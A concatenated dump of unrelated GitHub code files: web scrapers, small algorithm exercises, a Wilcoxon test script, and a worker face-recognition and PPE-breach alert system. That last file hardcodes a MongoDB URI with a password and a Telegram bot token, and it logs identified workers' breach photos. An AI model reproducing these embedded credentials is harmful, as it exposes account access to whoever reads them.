\"\"\"\n Test Spider to test selectors\n \"\"\"\n name ='Test'\n\n url ='https://www.adidas.ca/en/adicolor-classics-3-stripes-tee/HE9545.html'\n\n def start_requests(self):\n yield Request(TestSpider.url,\n self.parse,\n meta=dict(\n playwright=True,\n playwright_page_coroutines=[\n PageCoroutine('wait_for_selector', 'div#navigation-target-description p'),\n ]\n ))\n\n async def parse(self, response, **kwargs):\n l = ProductLoader(item=Product(), response=response)\n l.add_value('company', self.name)\n l.add_css('title', 'div[class*=sidebar-wrapper] h1[data-auto-id=product-title] span')\n l.add_css('subtitle', 'div[data-auto-id=product-category] span')\n l.add_css('price', 'div[class*=sidebar-wrapper] div[class*=product-price] div['\n 'class*=gl-price-item]')\n l.add_css('color', 'div[data-auto-id=color-chooser] h5::text')\n l.add_css('description', 'div#navigation-target-description p')\n l.add_value('url', response.url)\n l.add_css('photo', 'section[data-auto-id=image-viewer] img::attr(src)')\n return l.load_item()\n\n\nif __name__ == \"__main__\":\n from crawler.crawler import settings\n settings_dict = {}\n for st in dir(settings):\n if st.startswith('_'):\n continue\n settings_dict[st] = getattr(settings, st)\n process = CrawlerProcess(settings=settings_dict)\n process.crawl(TestSpider)\n process.start()\n\n\n\n","repo_name":"cara-mu/monestco","sub_path":"crawler/crawler/spiders/TestSpider.py","file_name":"TestSpider.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"11736862674","text":"class Eurovizio():\n def __init__(self,s):\n sor=s.split(\";\")\n self.ev=int(sor[0])\n self.orszag=sor[1]\n self.eloado=sor[2]\n self.cim=sor[3]\n self.helyezes=int(sor[4])\nlista=[]\nwith open(\"eurovizio.txt\", \"r\", encoding=\"utf-8\") as f:\n for i in f:\n lista.append(Eurovizio(i.strip()))\nf.close()\nprint(f\"Összesen {len(lista)} zeneszám van\")\n\nfor i in lista:\n if \"dream\" in i.cim.lower():\n print(f\"{i.eloado}: {i.cim}\")\n elif \"dream\" in i.cim.upper():\n print(f\"{i.eloado}: {i.cim}\")\n\norszag=input(\"Írj be egy országot: \")\ndb=0\nfor i in lista:\n if orszag==i.orszag:\n db+=1\nprint(f\"Összesen {db} alkalommal szerepelt az adott ország.\")\n\ndef pontszam(helyezes):\n return 101-helyezes\nlista_masodik=[]\nfor i in lista:\n if i.orszag==\"Magyarország\":\n lista_masodik.append(pontszam(i.helyezes))\nprint(f\"A magyarországi versenyzők átlagos pontszáma: {sum(lista_masodik)/len(lista_masodik):.2f}\")","repo_name":"dominiknyikos/Python","sub_path":"Komplex 3/Prog/eurovizio.py","file_name":"eurovizio.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"20663512004","text":"from django import template\nfrom instagram.utils import InstagramUtils\nfrom django.utils.translation import gettext_lazy as _\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef get_authorization_url():\n return InstagramUtils.get_authorization_url()\n\n\n@register.simple_tag\ndef get_latest_media(account_name):\n media = InstagramUtils.get_latest_media(account_name)\n if media is None:\n return {\n \"error_message\": _(\n \"Either an error occured or there is no media to show\"\n )\n }\n else:\n return media\n","repo_name":"UTNkar/moore","sub_path":"src/instagram/templatetags/instagram_tags.py","file_name":"instagram_tags.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"95"} +{"seq_id":"22309256645","text":"# Merge Sort \n# Merge\n\nimport random\nimport sys\n\nsys.setrecursionlimit(10000)\n\ndef Merge(l, m, h):\n one = lis[l:m+1]\n two = lis[m+1:]\n\n flag = l\n\n while (len(one) != 0 and len(two) != 0):\n if one[0] <= two[0]:\n lis[flag] = one[0]\n one.pop(0)\n else:\n lis[flag] = two[0]\n two.pop(0)\n\n flag += 1\n\n if len(one) != 0:\n for item in one:\n lis[flag] = item\n flag += 1\n \n if len(two) != 0:\n for item in two:\n lis[flag] = item\n flag += 1\n\ndef MergeSort(l, h):\n if l < h:\n m = int((l+h)/2)\n \n MergeSort(l, m)\n MergeSort(m+1, h)\n Merge(l, m, h)\n\n\nlis = []\n\nfor i in range(9):\n lis.append(random.randint(0, 20))\n\nprint(lis)\nprint(sorted(lis))\nMergeSort(0, 8)\nprint(lis)","repo_name":"mihirsam/Data-Structure-And-Algorithm-Python","sub_path":"MergeSort.py","file_name":"MergeSort.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"43176245615","text":"from collections import deque\nimport heapq\n\nv, e = map(int, input().split())\nvisited = [0] * (v+1)\ngraph = [[] for _ in range(v+1)]\nMIN = 2147483647\n\nfor i in range(e):\n\n a, b, c = map(int, input().split())\n\n graph[a].append([c,a,b])\n graph[b].append([c,b,a])\n \ndef prim(graph, a):\n\n visited[a] = 1\n adj_edge = graph[a]\n heapq.heapify(adj_edge) #heapq로 만들면 자동으로 정렬\n dist = 0\n \n while adj_edge:\n \n weight, x, y = heapq.heappop(adj_edge)\n\n if visited[y] == 0: #방문한 적 없는 가중치 가장 작은 간선\n visited[y] = 1 #방문 갱신\n dist += weight #가중치 갱신\n\n #print(graph[y])\n for e in graph[y]: #방문하지 않은 새로운 간선 추가\n if visited[e[2]] == 0:\n heapq.heappush(adj_edge, e)\n\n return dist\n\nprint(prim(graph, 1))\n","repo_name":"Arkinee/BOJ","sub_path":"백준(1197).py","file_name":"백준(1197).py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"74915235513","text":"from itertools import count\nfrom cv2 import merge\nimport requests\nfrom bs4 import BeautifulSoup as bs\nimport pandas as pd\nfrom scipy.fftpack import diff\n\nclass Total_crawling():\n def __init__(self):\n # self.columns = [\"프로그램 명\",\"설명\",\"담당자 이름\",\"담당기관\",\"담당자 연락처\",\"신청자격\",\"신청방법\",\"연결 URL\"]\n pass\n \n ##초기 변수 셋팅\n def initial_setting(self,sitename,col_list):\n self.dic={}\n self.my_columns = col_list\n for col in self.my_columns:\n self.dic[col]=list()\n self.name_dic={\"담당기관\":[],\"담당자연락처\":[],\"연결URL\":[]}\n self.sitename = sitename\n\n\n ## 프로그램 사이트 url 찾기\n def find_data(self,url,program_page=\"\"):\n self.html = requests.get(url+program_page).text\n self.htmlAll = bs(self.html,'html.parser')\n\n \n ## dic, name_dic 변수에 데이터 추가\n def col_append_data(self, df, site_name,siteNumber,siteURL, current_col=[], differ_col = []):\n for col in current_col:\n for value in df[col]:\n self.dic[col].append(value)\n if len(differ_col) != 0:\n for differ in differ_col:\n for _ in range(len(df[col])):\n self.dic[differ].append(\"\")\n for _ in range(len(df[current_col[0]].values)):\n self.name_dic[\"담당기관\"].append(site_name)\n self.name_dic[\"담당자연락처\"].append(siteNumber)\n self.name_dic[\"연결URL\"].append(siteURL)\n \n\n def dic_to_csv(self):\n sort_columns = list(self.my_columns)\n sort_columns.insert(3,\"담당기관\")\n sort_columns.insert(4,\"담당자연락처\")\n sort_columns.insert(-1,\"연결URL\")\n result_df = pd.DataFrame(self.dic)\n result_df = result_df[sort_columns]\n result_df.to_csv('./{}.csv'.format(self.sitename), sep=',', na_rep='NaN',encoding=\"utf-8-sig\", index=False)\n\n\n def sbsports(self):##서부재활체육센터\n sitename = \"서부재활체육센터\" \n my_columns = [\"프로그램명\",\"설명\",\"담당자이름\",\"신청자격\",\"신청방법\"]#,\"담당기관\",\"담당자연락처\",\"연결URL\"\n url = \"http://www.sbsports.or.kr/sub/wrcAble.do\"\n self.initial_setting(sitename,my_columns)\n self.find_data(url)\n siteNumber = self.htmlAll.find(\"ul\",{\"class\":\"clearfix\"}).find_all(\"li\")[1].text[5:-2]\n df_list = pd.read_html(self.html,header=0)\n # tb_name_list = [x.text.strip() for x in self.htmlAll.find_all(\"caption\")]\n\n for i in range(len(df_list)):#len(df_list)\n ##현재 테이블의 컬럼 가져오기\n current_col = df_list[i].columns.tolist()\n for name in current_col:\n df_list[i]=df_list[i].rename({name:name.replace(\" \",\"\")},axis=1)\n current_col = df_list[i].columns.tolist()\n\n merge_cols = []##[\"참가요일\",\"시간\",\"회비\"] => 설명 컬럼에 병합해서 넣기\n for col in current_col:\n if col == \"비고\":\n current_col.remove(col)\n if col == \"구분\" or col == \"프로그램\":\n df_list[i]=df_list[i].rename({col:\"프로그램명\"},axis=1)\n current_col.remove(col)\n current_col.append(\"프로그램명\")\n if col == \"참가요일 및 시간\" or col == \"참가요일\":\n df_list[i]=df_list[i].rename({col:\"참가요일\"},axis=1)\n merge_cols.append(\"참가요일\")\n # current_col.remove(col)\n # current_col.append(\"참가요일\")\n current_col.remove(col)\n if col == \"정원\":\n current_col.remove(col)\n if col == \"프로그램.1\":\n current_col.remove(col)\n if col == \"대상\":\n df_list[i]=df_list[i].rename({col:\"신청자격\"},axis=1)\n current_col.remove(col)\n current_col.append(\"신청자격\")\n if col == \"시간\":\n merge_cols.append(\"시간\")\n if col == \"회비\":\n merge_cols.append(\"회비\")\n \n ## 설명 컴럼 추가\n current_col.append(\"설명\")\n df_list[i]['설명'] =df_list[i][merge_cols].apply(lambda row: '; '.join(row.values.astype(str)), axis=1) ##;(세미콜론)으로 구분\n \n inter_col = list(set(self.my_columns) & set(current_col))\n differ_col = list(set(self.my_columns).difference(current_col))\n\n self.col_append_data(df_list[i],sitename,siteNumber,url, current_col = inter_col, differ_col = differ_col)\n self.dic.update(self.name_dic)\n self.dic_to_csv()\n \n \n def sbsd(self):#서부산권장애인스포츠센터\n sitename = \"서부산권장애인스포츠센터\"\n my_columns = [\"프로그램명\",\"설명\",\"담당자이름\",\"신청자격\",\"신청방법\"]\n url = \"https://www.sbsd.kr/Home/\"\n self.initial_setting(sitename,my_columns)\n self.find_data(url)\n program_page = self.htmlAll.find(\"li\",{\"class\":\"cd1 cd1c4\"}).find(\"a\")[\"href\"].split(\"/\")[-1]\n self.find_data(url,program_page=program_page)\n siteNumber = \" \".join(self.htmlAll.find(\"address\",{\"class\":\"foot_in\"}).find(\"span\").text.split()[2:4])\n print(siteNumber)\n pages = self.htmlAll.find('nav',{\"class\":\"tabmenu\"}).find_all(\"li\",{\"class\":\"cd3\"})\n programURLs = []\n \n for elem in pages:\n programURLs.append(elem.find(\"a\")[\"href\"].split(\"/\")[-1]) ## 페이지 넘버\n for i in range(len(programURLs)):\n self.find_data(url,program_page = programURLs[i])\n initial_df = pd.read_html(self.html,header=0)[0]\n current_col = initial_df.columns.tolist()\n merge_cols = []\n for col in current_col:\n if col == \"프로그램\":\n initial_df = initial_df.rename({col:\"프로그램명\"},axis=1)\n current_col.remove(col)\n current_col.append(\"프로그램명\")\n if col == \"교육일\":\n current_col.remove(col)\n merge_cols.append(\"교육일\")\n if col == \"대상\":\n initial_df = initial_df.rename({col:\"신청자격\"},axis=1)\n current_col.remove(col)\n current_col.append(\"신청자격\")\n if col == \"시간\":\n current_col.remove(col)\n merge_cols.append(\"시간\")\n if col == \"사용료\":\n current_col.remove(col)\n merge_cols.append(\"사용료\")\n if col == \"정원\":\n current_col.remove(col)\n merge_cols.append(\"정원\")\n current_col.append(\"설명\")\n initial_df['설명'] =initial_df[merge_cols].apply(lambda row: '; '.join(row.values.astype(str)), axis=1) ##;(세미콜론)으로 구분\n inter_col = list(set(self.my_columns) & set(current_col))\n differ_col = list(set(self.my_columns).difference(current_col))\n self.col_append_data(initial_df,sitename,siteNumber,url+programURLs[i], current_col = inter_col,differ_col=differ_col)\n # for col in current_col:\n # for value in initial_df[col]:\n # self.dic[col].append(value)\n # for _ in range(len(initial_df[current_col[0]].values)):\n # self.name_dic[\"담당기관\"].append(sitename)\n # self.name_dic[\"담당자연락처\"].append(siteNumber)\n # self.name_dic[\"연결URL\"].append(url)\n \n \n self.dic.update(self.name_dic)\n self.dic_to_csv()\n \n \n def bisco(self):#부산한마음스포츠센터\n sitename = \"부산한마음스포츠센터\"\n my_columns = [\"프로그램명\",\"설명\",\"담당자이름\",\"신청자격\",\"신청방법\"]\n url = \"http://hmsports.bisco.or.kr\"\n self.initial_setting(sitename,my_columns)\n self.find_data(url)\n program_page = self.htmlAll.find_all(\"li\",{\"class\":\"mn_li1\"})[1].find(\"a\")[\"href\"]\n self.find_data(url,program_page=program_page)\n siteNumber = \"\"\n pages = self.htmlAll.find_all(\"ul\",{\"class\":\"depth2\"})[-1].find_all(\"a\")\n programURLs = [url[\"href\"] for url in pages]\n del programURLs[-1]## 통합방과후학교 삭제\n del programURLs[4]## 실내골프연습장 삭제\n del programURLs[2]## 피트니스실 삭제 \n for purl in programURLs:\n self.find_data(url,program_page=purl)\n initial_df = pd.read_html(self.html,header=0)[0]\n current_col = initial_df.columns.tolist()\n merge_cols = [\"반\",\"교육일\",\"시간\"]\n for col in current_col:\n print(col)\n if col == \"프로그램\":\n initial_df = initial_df.rename({col:\"프로그램명\"},axis=1)\n current_col.remove(col)\n current_col.append(\"프로그램명\")\n if col == \"대상\":\n initial_df = initial_df.rename({col:\"신청자격\"},axis=1)\n current_col.remove(col)\n current_col.append(\"신청자격\")\n current_col.append(\"설명\")\n initial_df['설명'] =initial_df[merge_cols].apply(lambda row: '; '.join(row.values.astype(str)), axis=1) ##;(세미콜론)으로 구분\n inter_col = list(set(self.my_columns) & set(current_col))\n differ_col = list(set(self.my_columns).difference(current_col))\n self.col_append_data(initial_df,sitename,siteNumber,url+purl, current_col = inter_col,differ_col=differ_col)\n self.dic.update(self.name_dic)\n self.dic_to_csv()\n\ns = Total_crawling()\n# s.sbsports()\n# s.sbsd()\ns.bisco()","repo_name":"Grayson1999/ACIN-crawling","sub_path":"method_crawling.py","file_name":"method_crawling.py","file_ext":"py","file_size_in_byte":10111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"20632353677","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 21 04:40:56 2019\nThe progam is tested and working correctly if incase of any issues. please contact jnikhil@seas.upenn.edu\nPakages and dependancies to be install before the program runs are pandas, numpy, itertools \nPandas data frame properties are primarily used for large data operations\n\nTwo different definations are given for test statistic on Wikipedia and other source. The program function returns W statistic \nbased on both methods.\n\n@author: jnikhil\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom pandas import ExcelWriter\nfrom pandas import ExcelFile\nimport itertools as it\n\ndef wilcoxon_signed_rank_test(data_df):\n \n '''\n The function takes pandas data frame and returns the dictionary of pair of products\n and itsWilcoxon Signed Rank Test statistic. \n **It returns two different dictionaries based on defination for Test statistic on Wikipedia and other university source\n Both W statistics represnets same major \n '''\n frame_cols = data_df.columns\n required_cols = frame_cols[2:]\n dict_pair_wiki = {}\n dict_pair_theory = {}\n \n for i in range(len(required_cols)):\n wtest_df = pd.DataFrame(columns = ['key', 'nonkey', 'abs_diff','sgn','rank','sgn_x_rank'])\n wtest_df['key'] = data_df.iloc[:,1]\n wtest_df['nonkey'] = data_df.iloc[:,i+2]\n wtest_df['abs_diff'] = abs(wtest_df['key'] - wtest_df['nonkey'])\n wtest_df['sgn'] = np.sign(wtest_df['key'] - wtest_df['nonkey'])\n wtest_df = wtest_df[(wtest_df[['abs_diff']] != 0).all(axis=1)]\n wtest_df = wtest_df.sort_values(by=['abs_diff'])\n wtest_df['rank'] = wtest_df['abs_diff'].rank(ascending=1) #ranked from lowest to highest, with tied ranks included where appropriate\n wtest_df['sgn_x_rank'] = wtest_df['sgn']*wtest_df['rank']\n negative_df = wtest_df[(wtest_df[['sgn_x_rank']] < 0).all(axis=1)]\n positive_df = wtest_df[(wtest_df[['sgn_x_rank']] > 0).all(axis=1)]\n nrank_sum = abs(negative_df['sgn_x_rank'].sum())\n prank_sum = positive_df['sgn_x_rank'].sum() \n \n # Wikipedia - W stat is equal to sum of all singed ranks \n dict_pair_wiki.update({(frame_cols[1],frame_cols[i+2]):wtest_df['sgn_x_rank'].sum()})\n \n # other source - W stat is equal to min of sum of negtive ranks and sum of positive ranks\n dict_pair_theory.update({(frame_cols[1],frame_cols[i+2]):min(nrank_sum,prank_sum)})\n \n return (dict_pair_wiki,dict_pair_theory) \n\n\ndef permu_n_weights(data_df):\n \n '''\n This function calculates permu with weights i.e combinations of products to be compared and returns new data frame. \n Using 100% equal weighting tp calculate the weighted combination of the columns of products to be compared .The function also returns\n list of combinations along with new data frame. \n '''\n \n all_columns = data_df.columns\n nonkey_cols = all_columns[2:]\n prod_combinations = []\n \n for i in range(len(nonkey_cols)-1):\n prod_combinations.extend(list(it.combinations(nonkey_cols, i+2))) \n \n for element in prod_combinations:\n sum = 0\n col_name = \"W_\"\n for sub in element:\n S = sub\n sum = sum+data_df[S]\n col_name = col_name + sub + \"_\"\n col_name = col_name[:-1]\n data_df[col_name] = sum/(len(element))\n \n PerW_df = data_df.drop(nonkey_cols, axis=1) \n \n return (prod_combinations,PerW_df)\n\n\ndef main():\n \n '''\n The data file is always assumed to be having first column as identifier, second as a 'main Product'\n and remaining columns are products to be compared\n '''\n \n data_df = pd.read_excel('Algodata.xlsx', sheet_name='Data')\n data_df = data_df.drop_duplicates(subset='Customer', keep=\"last\")\n # Removes the duplicate customers if any \n \n dict_pair_wiki,dict_pair_theory = wilcoxon_signed_rank_test(data_df)\n \n print(\"\\nKey and Non Key product pair with W test (Wikipedia Defination):\\n\")\n #print(dict_pair_wiki)\n for index, (key, value) in enumerate(dict_pair_wiki.items()):\n print( str(index) + \" : \" + str(key) + \" : \" + str(value) )\n \n print(\"\\nKey and Non Key product pair with W test (Book Defination):\\n\")\n #print(dict_pair_theory)\n for index, (key, value) in enumerate(dict_pair_theory.items()):\n print( str(index) + \" : \" + str(key) + \" : \" + str(value) )\n \n prod_comb,PerW_df= permu_n_weights(data_df)\n pw_pair_wiki,pw_pair_theory = wilcoxon_signed_rank_test(PerW_df)\n \n print(\"\\nNumber of Product Combinations:\\n\")\n print(len(prod_comb))\n \n print(\"\\nProduct Combinations:\\n\")\n print((prod_comb))\n \n print(\"\\nKey and Non key combination with W test (Wikipedia Defination):\\n\")\n #print(pw_pair_wiki)\n for index, (key, value) in enumerate(pw_pair_wiki.items()):\n print( str(index) + \" : \" + str(key) + \" : \" + str(value) )\n \n print(\"\\nKey and Non key combination with W test (Book Defination):\\n\")\n #print(pw_pair_theory)\n for index, (key, value) in enumerate(pw_pair_theory.items()):\n print( str(index) + \" : \" + str(key) + \" : \" + str(value) )\n \n bestfit_nonkey = min(dict_pair_wiki, key=lambda y: abs(dict_pair_wiki[y]))\n print(\"\\nBest Fit non key product:\\n\")\n print(bestfit_nonkey) #Best fit non key product for which pair has least absolute W stat \n # The value is near to zero or postive and negative are approx.equal \n \n print(\"\\nBest Fit non key product combinations:\\n\")\n bestfit_pernw = min(pw_pair_wiki, key=lambda y: abs(pw_pair_wiki[y]))\n print(bestfit_pernw) # Best fit combination for which test statisitc is near to zero or least among all\n \nif __name__ == \"__main__\":\n main()","repo_name":"NikhilJPENN/Wilcoxon-signed-rank-test","sub_path":"wrtest_pandas.py","file_name":"wrtest_pandas.py","file_ext":"py","file_size_in_byte":5832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"38029974336","text":"import face_recognition\nimport cv2\nimport numpy as np\nfrom pymongo.mongo_client import MongoClient\nfrom ultralytics import YOLO\nimport threading\nimport time\nfrom datetime import datetime\nimport collections\nfrom collections import Counter\nimport os\nimport asyncio\nfrom telegram import Bot\nimport httpx\nimport base64\n\nasync def send_message(bot_token, chat_id, name, breach, image, location, breach_id):\n base64_image = base64.b64encode(image).decode('utf-8') # Decode base64 to string\n \n retries = 3\n for attempt in range(1, retries + 1):\n try:\n async with httpx.AsyncClient(timeout=httpx.Timeout(timeout=5.0)) as client:\n response = await client.post(\n f\"https://api.telegram.org/bot{bot_token}/sendPhoto\",\n data={\"chat_id\": chat_id},\n files={\"photo\": (\"image.jpg\", image, \"image/jpeg\")},\n params = {\n \"caption\": (\n f\"Breach number:{breach_id} \\n\\n\"\n f\"{name} was not wearing a {breach}\\n\"\n f\"Location of breach: {location}\\n\"\n f\"Time of breach: {datetime.now()}\"\n )\n }\n )\n print(f\"Response Status Code: {response.status_code}\")\n break # Break the loop if the request succeeds\n except (httpx.ConnectError, httpx.ReadError, httpx.TimeoutException) as exc:\n print(f\"Failed attempt {attempt}/{retries}: {exc}\")\n if attempt == retries:\n print(\"Request failed after maximum retries\")\n break\n else:\n print(\"Retrying...\") \n continue \n\n#Telegram Bot token and Chat ID (Astro's Chat ID)\nbot_token = '6060060457:AAGRyic-1HVFcUy1dSEsdLMJo0rB9Mvz0y0'\nchat_id = '1629576653'\n\nuri = \"mongodb+srv://loctientran235:PUp2XTv7tkArDjJB@c290.5lmj4xh.mongodb.net/?retryWrites=true&w=majority\"\n# Create a new client and connect to the server\ndb_client = MongoClient(uri)\ndb = db_client[\"construction\"]\ncollection = db[\"encodings_test3\"]\ncollection2 = db[\"db_breaches_2\"]\n\n# Send a ping to confirm a successful connection\ntry:\n db_client.admin.command('ping')\n print(\"Pinged your deployment. You successfully connected to MongoDB!\")\nexcept Exception as e:\n print(e)\n\nstop_event = threading.Event() \n\nemployee_data = None\n\nai_model = YOLO('ai_model\\\\ppe_model.pt')\n# ai_model = YOLO('D:/Workspace/Flask-Server/ai_server/ai_model/ppe_model.pt')\n\nphoto_path = \"UI_photos\\\\\"\n# photo_path = 'D:/Workspace/Flask-Server/ai_server/UI_photos/'\n\nimgBackground = cv2.imread(photo_path + 'background.png')\nmodel = cv2.imread(photo_path + 'pageA.png')\nclear_text = cv2.imread(photo_path + 'clear.png')\nclear_text2 = cv2.imread(photo_path + 'clear2.png')\n\n#avaList\nfolderAvaPath = photo_path + 'Ava'\navaPathList = os.listdir(folderAvaPath)\nimgAvaList = []\nfor path in avaPathList:\n imgAvaList.append(cv2.imread(os.path.join(folderAvaPath, path)))\n\n#ppeList\nfolderPpePath = photo_path + 'ppe'\nppePathList = os.listdir(folderPpePath)\nimgPpeList = []\nfor path in ppePathList:\n imgPpeList.append(cv2.imread(os.path.join(folderPpePath, path)))\n\ndef train_encoding(image_url):\n image = face_recognition.load_image_file(image_url)\n name = image_url.split(\".\")[0]\n encoding = face_recognition.face_encodings(image)[0]\n object_encoding = encoding.astype(object)\n result = np.insert(object_encoding, 0, name)\n return result\n\ndef save_encodings(encoding):\n # convert the array to BSON\n encoding_list = encoding.tolist()\n collection.insert_one({\"encode\": encoding_list})\n\ndef retrieve_encoding():\n # retrieve all the documents from the collection\n encoding_data = collection.find()\n\n # create a list to store the encodings\n encoding_list = []\n for encoding in encoding_data:\n num_vals = encoding['encode'][1:]\n detect_name = encoding['encode'][0]\n encode_np = np.array(num_vals)\n encoding_list.append((detect_name, encode_np))\n \n return encoding_list \n\ndef update_employee(name):\n collection = db[\"workers\"]\n global employee_data\n employee_data = collection.find_one({\"name\": name})\n print(employee_data)\n \ndef search_data_thread(name):\n thread = threading.Thread(target=update_employee, args=(name,))\n thread.start()\n return thread\n\ndef alert_process(breach_ppe, most_frequent_name, worker_breaches):\n alert_message = \"[ALERT]\\nWorker Name:\" + most_frequent_name + \" is not wearing the proper PPE!\\nTimestamp: \" + datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\")\n #asyncio.run(send_message(bot_token, chat_id, alert_message))\n \n # Check the length of the list before appending\n initial_length = len(worker_breaches)\n\n new_breach = {\"Workername\": most_frequent_name, \"Breach\": breach_ppe}\n\n # # Check if the new breach already exists for the same workername with any breach\n # if any(breach[\"Workername\"] == new_breach[\"Workername\"] for breach in worker_breaches):\n # existing_breaches = {breach[\"Breach\"] for breach in worker_breaches if breach[\"Workername\"] == new_breach[\"Workername\"]}\n # print(existing_breaches)\n \n # # Check if the new breach is a duplicate for the same workername\n # if not new_breach[\"Breach\"] in existing_breaches:\n # worker_breaches.append(new_breach)\n # else:\n # worker_breaches.append(new_breach)\n\n # Check if workername already exists\n if not any(breach[\"Workername\"] == new_breach[\"Workername\"] for breach in worker_breaches):\n worker_breaches.append(new_breach)\n\n # Check the length of the list after appending\n updated_length = len(worker_breaches)\n\n # Check if a new entry has been added\n if updated_length > initial_length:\n print(\"New entry has been added to the list.\")\n print(worker_breaches[-1])\n\n #Capture the frame with the plotting boxes for breach images\n frame_capture = imgBackground[158:158 + 480, 52:52 + 640]\n\n # Capture the frame as an image\n _, buffer = cv2.imencode(\".jpg\", frame_capture)\n encoded_image = base64.b64encode(buffer).decode(\"utf-8\")\n\n # Find the document with the highest breach ID\n largest_breach = collection2.find_one(sort=[(\"breach_id\", -1)])\n\n if largest_breach is None:\n next_breach_id = 1\n else:\n # Determine the next breach ID\n next_breach_id = largest_breach[\"breach_id\"] + 1\n\n Location = \"Entrance A\"\n\n worker_breach_name = worker_breaches[-1][\"Workername\"]\n worker_breach_description = worker_breaches[-1][\"Breach\"]\n\n # Save the encoded image in MongoDB\n collection2.insert_one({\n \"datetime\": datetime.now(),\n \"worker_name\": worker_breach_name,\n \"description\": worker_breach_description,\n \"breach_id\": next_breach_id,\n \"severity\": \"\",\n \"evidence_photo\": encoded_image,\n \"location\": Location,\n \"case_resolved\": False,\n \"case_resolution\": None,\n \"case_resolved_time\": None\n })\n\n description = worker_breach_description.split(\",\")\n description_array = [item.strip().replace(\"no-\", \"\") for item in description]\n tele_description = \", \".join(description_array)\n\n capture_image = frame_capture.copy()\n retval, buffer = cv2.imencode('.jpg', capture_image)\n image_bytes = buffer.tobytes()\n loop = asyncio.get_event_loop()\n loop.run_until_complete(send_message(bot_token, chat_id, worker_breach_name, tele_description, image_bytes, Location, next_breach_id))\n\ndef plot_bboxes(draw_box_ppe, image, boxes, labels=[], colors=[], score=True, conf=None):\n output = []\n \n # #Define COCO Labels\n # if labels == []:\n # labels = {0: u'__background__', 1: u'helmet', 2: u'no-helmet', 3: u'no-vest', 4: u'vest'}\n # #Define colors\n # colors = [(0,255,0),(0,0,255),(0,0,255),(0,255,0)]\n\n #Define COCO Labels\n if labels == []:\n labels = {0: u'__background__', 1: u'helmet', 2: u'mask', 3: u'no-helmet', \n 4: u'no-mask', 5: u'no-vest', 6: u'Person', \n 7: u'Safety Cone', 8: u'vest', 9: u'machinery', 10: u'vehicle'}\n # 'Hardhat', 'Mask', 'NO-Hardhat', 'NO-Mask', 'NO-Safety Vest', \n # 'Person', 'Safety Cone', 'Safety Vest', 'machinery', 'vehicle'\n #Define colors\n colors = [(0,255,0),(0,255,0),(0,0,255),\n (0,0,255),(0,0,255),(123,63,0),\n (123,63,0),(0,255,0),(123,63,0),(123,63,0)]\n\n label_list = []\n exclude_labels = ['Person', 'machinery', 'vehicle', 'Safety Cone']\n\n if(employee_data is not None):\n role = employee_data[\"position\"]\n if role == \"Supervisor\":\n exclude_labels = ['Person', 'machinery', 'vehicle', 'Safety Cone', 'no-mask']\n\n #plot each boxes\n for box in boxes:\n #add score in label if score=True\n if score :\n label = labels[int([-1])+1] + \" \" + str(round(100 * float(box[-2]),1)) + \"%\"\n else :\n label = labels[int(box[-1])+1]\n #filter every box under conf threshold if conf threshold setted\n if conf :\n if box[-2] > conf:\n color = colors[int(box[-1])]\n else:\n color = colors[int(box[-1])]\n \n #box label\n if draw_box_ppe:\n if label not in label_list and label not in exclude_labels:\n label_list.append(label)\n\n lw = max(round(sum(image.shape) / 2 * 0.003), 2)\n p1, p2 = (int(box[0]), int(box[1])), (int(box[2]), int(box[3]))\n cv2.rectangle(image, p1, p2, color, thickness=lw, lineType=cv2.LINE_AA)\n tf = max(lw - 1, 1) # font thickness\n w, h = cv2.getTextSize(label, 0, fontScale=lw / 3, thickness=tf)[0] # text width, height\n outside = p1[1] - h >= 3\n p2 = p1[0] + w, p1[1] - h - 3 if outside else p1[1] + h + 3\n cv2.rectangle(image, p1, p2, color, -1, cv2.LINE_AA) # filled\n cv2.putText(image,\n label, (p1[0], p1[1] - 2 if outside else p1[1] + h + 2),\n 0,\n lw / 3,\n color=(255, 255, 255),\n thickness=tf,\n lineType=cv2.LINE_AA)\n output.append(label)\n return output\n\ndef facial_recognition(frame, draw_box_face, known_face_encodings, known_face_names, face_names, checkin_recorded):\n # Resize frame of video to 1/4 size for faster face recognition processing\n small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n\n # Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)\n rgb_small_frame = small_frame[:, :, ::-1]\n \n # Find all the faces and face encodings in the current frame of video\n face_locations = face_recognition.face_locations(rgb_small_frame)\n face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)\n\n for face_encoding in face_encodings:\n # See if the face is a match for the known face(s)\n matches = face_recognition.compare_faces(known_face_encodings, face_encoding, tolerance=0.5)\n name = \"Unknown\"\n\n # If a match was found in known_face_encodings, just use the first one.\n if True in matches:\n first_match_index = matches.index(True)\n name = known_face_names[first_match_index]\n\n else:\n # Or instead, use the known face with the smallest distance to the new face\n face_distances = face_recognition.face_distance(known_face_encodings, face_encoding)\n best_match_index = np.argmin(face_distances)\n if matches[best_match_index]:\n name = known_face_names[best_match_index]\n \n face_names.append(name)\n\n # \"Number of workers working today\" feature:\n\n # Create a single document for each day to store all the worker check-ins\n checkin_data = {\n \"date\": datetime.now().strftime(\"%Y-%m-%d\"),\n \"check_ins\": []\n }\n\n # Check if the detected face is a known employee and insert check-in record\n if name != \"Unknown\" and name not in checkin_recorded:\n collection = db[\"workers\"]\n worker_data = collection.find_one({\"name\": name})\n if worker_data is not None:\n position = worker_data[\"position\"]\n worker_id = worker_data[\"worker_id\"]\n supervisor = worker_data[\"supervisor\"]\n 